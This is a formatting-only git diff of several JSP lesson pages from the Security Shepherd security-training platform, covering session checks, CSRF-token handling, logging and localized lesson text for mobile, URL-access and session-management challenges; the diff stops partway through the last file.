 //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.m_poor_authentication");
+String translatedLevelName = bundle.getString("title.question.m_poor_authentication");
 
 /**
  * <br/><br/>
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
  *
  * @author Sean Duggan
  */
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <p>
-    <h2 class="title"><%= translatedLevelName  %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info") %>
-        <br/> </br> </br> <input type="button"
-                                 value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.hideIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br> <br/>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " PoorAuthentication.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
-    </p>
-    <script>
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
-
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-    </p>
-</div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<p>
+		<h2 class="title"><%= translatedLevelName  %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info") %>
+			<br /> </br> </br> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.hideIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br> <br />
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " PoorAuthentication.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+		</p>
+		<script>
+				$('#hideLesson').click(function(){
+					$("#lessonIntro").hide("slow", function(){
+						$("#showLesson").show("fast");
+					});
+				});
+				
+				$("#showLesson").click(function(){
+					$('#showLesson').hide("fast", function(){
+						$("#lessonIntro").show("slow");
+					});
+				});
+			</script>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+		</p>
+	</div>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.jsp b/src/main/webapp/lessons/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.jsp
index 3756b47f2..f6b790fc8 100644
--- a/src/main/webapp/lessons/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.jsp
+++ b/src/main/webapp/lessons/911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212.jsp
@@ -1,113 +1,120 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    //No Quotes In level Name
-    String levelName = "Mobile Broken Crypto?";
-    //Alphanumeric Only
-    String levelHash = "911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212";
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_broken_crypto." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.mobile_broken_crypto");
-
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	//No Quotes In level Name
+	String levelName = "Mobile Broken Crypto?";
+	//Alphanumeric Only
+	String levelHash = "911fa7f4232e096d6a74a0623842c4157e29b9bcc44e8a827be3bb7e58c9a212";
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_broken_crypto." + levelHash, locale);
+	ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.mobile_broken_crypto");
+	
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 *
+	 * @author Sean Duggan
+	 */
 
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <br/>
-        <%= bundle.getString("paragraph.info1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info2") %>
-        <br/> <br/> <input type="button"
-                           value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/>
-    <%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
-    </p>
-    <script>
-        $('#hideLesson').click(function () {
-            $("#lessonIntro").hide("slow", function () {
-                $("#showLesson").show("fast");
-            });
-        });
-
-        $("#showLesson").click(function () {
-            $('#showLesson').hide("fast", function () {
-                $("#lessonIntro").show("slow");
-            });
-        });
-    </script>
-</div>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<br />
+			<%= bundle.getString("paragraph.info1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info2") %>
+			<br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br />
+		<%= mobile.getString("mobileBlurb.vmLink.1") + " BrokenCrypto.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+		</p>
+		<script>
+				$('#hideLesson').click(function(){
+					$("#lessonIntro").hide("slow", function(){
+						$("#showLesson").show("fast");
+					});
+				});
+			
+				$("#showLesson").click(function(){
+					$('#showLesson').hide("fast", function(){
+						$("#lessonIntro").show("slow");
+					});
+				});
+			</script>
+	</div>
+	<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+		}
+		else
+		{
+			response.sendRedirect("../loggedOutSheep.html");
+		}
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
 %>
diff --git a/src/main/webapp/lessons/adminOnly/resultKey.jsp b/src/main/webapp/lessons/adminOnly/resultKey.jsp
index 2c469bfdc..53fc98bfb 100644
--- a/src/main/webapp/lessons/adminOnly/resultKey.jsp
+++ b/src/main/webapp/lessons/adminOnly/resultKey.jsp
@@ -1,111 +1,118 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    String levelName = "Failure To Restrict URL Access Lesson Target";
-    String levelResult = "f60d1337ac4d35cb67880a3adda79";
-    String levelHash = "oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3";
+String levelName = "Failure To Restrict URL Access Lesson Target";
+String levelResult = "f60d1337ac4d35cb67880a3adda79";
+String levelHash = "oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.failure_to_restrict_url_access." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.failure_to_restrict_url_access." + levelHash, locale);
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html>
 <head></head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<br/>
-<p><%= bundle.getString("challenge.resultKey") %>:
-    <strong><%= Hash.generateUserSolutionKeyOnly(levelResult, (String) ses.getAttribute("userName")) %>
-    </strong>
-</p>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<br />
+	<p><%= bundle.getString("challenge.resultKey") %>: <strong><%= Hash.generateUserSolutionKeyOnly(levelResult, (String)ses.getAttribute("userName")) %></strong>
+	</p>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.jsp b/src/main/webapp/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.jsp
index 58e991094..af9122bf4 100644
--- a/src/main/webapp/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.jsp
+++ b/src/main/webapp/lessons/b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806.jsp
@@ -1,211 +1,214 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
-<%@ page import="dbProcs.FileInputProperties" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
+<%@ page import="dbProcs.FileInputProperties"%>
 
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * <br/><br/>
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "Session Management Lesson";
-    final String LEVEL_HASH = "b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806";
+	final String LEVEL_NAME = "Session Management Lesson";
+	final String LEVEL_HASH = "b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.session_manage." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.session_manage");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.session_manage." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.session_manage");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sessionManagement");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.sessionManagement");
 
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	
 %>
 <script>
-    document.cookie = "lessonComplete=lessonNotComplete";
+	document.cookie="lessonComplete=lessonNotComplete";
 </script>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/>
-        <a><%= bundle.getString("paragraph.info.number.1") %>
-        </a>
-        <%= bundle.getString("paragraph.info.1.1") %>
-        <br/>
-        <a><%= bundle.getString("paragraph.info.number.2") %>
-        </a>
-        <%= bundle.getString("paragraph.info.2.2") %>
-        <br/>
-        <a><%= bundle.getString("paragraph.info.number.3") %>
-        </a>
-        <%= bundle.getString("paragraph.info.3.3") %>
-        <br/>
-        <a><%= bundle.getString("paragraph.info.number.4") %>
-        </a>
-        <%= bundle.getString("paragraph.info.4.4") %>
-        <br/>
-        <a><%= bundle.getString("paragraph.info.number.5") %>
-        </a>
-        <%= bundle.getString("paragraph.info.5.5") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            Session Management
-        </a> <br/> <br/>
-        <%= bundle.getString("paragraph.info.5.5") %>
-        <br/> <input type="button"
-                     value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/>
-
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("hint.title") %>
-        </h2>
-        <%= bundle.getString("lesson.hint.1") %>
-        <br/> <br/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br />
+			<a><%= bundle.getString("paragraph.info.number.1") %></a>
+			<%= bundle.getString("paragraph.info.1.1") %>
+			<br />
+			<a><%= bundle.getString("paragraph.info.number.2") %></a>
+			<%= bundle.getString("paragraph.info.2.2") %>
+			<br />
+			<a><%= bundle.getString("paragraph.info.number.3") %></a>
+			<%= bundle.getString("paragraph.info.3.3") %>
+			<br />
+			<a><%= bundle.getString("paragraph.info.number.4") %></a>
+			<%= bundle.getString("paragraph.info.4.4") %>
+			<br />
